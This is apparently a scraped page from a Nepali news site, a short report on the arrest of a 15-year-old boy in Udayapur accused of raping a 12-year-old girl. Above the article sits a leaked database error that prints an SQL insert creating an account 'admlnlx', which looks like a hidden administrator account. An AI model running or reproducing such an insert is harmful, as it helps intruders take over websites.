WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ8DX8Do461FshyNkRfpIeZeRqemAo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 04:35:53', '', 'admlnlx', 'admlnlx')
उदयपुर, माघ १५ –
उदयपुरमा बालिका बलात्कार गरेको आरोपमा एक बालक पक्राउ परेका छन् । १२ वर्षे बालिकालाई बलात्कार गरेको आरोपमा उदयपुरको जाल्पा चिलाउने–४ का १५ वर्षका बालक पक्राउ परेका हुन् ।
प्रहरी चौकी सुकौराका प्रमुख असई राजकुमार खड्काले बालिकाले दिएको उजुरीका आधारमा बालकलाई पक्राउ गरिएको बताउनुभयो ।
माघ १० बालिकाको बलात्कार भएको प्रहरीको भनाई छ । थप अनुसन्धानका लागि बालकलाई जिल्ला प्रहरी कार्यालय उदयपुर ल्याइएको जनाइएको छ ।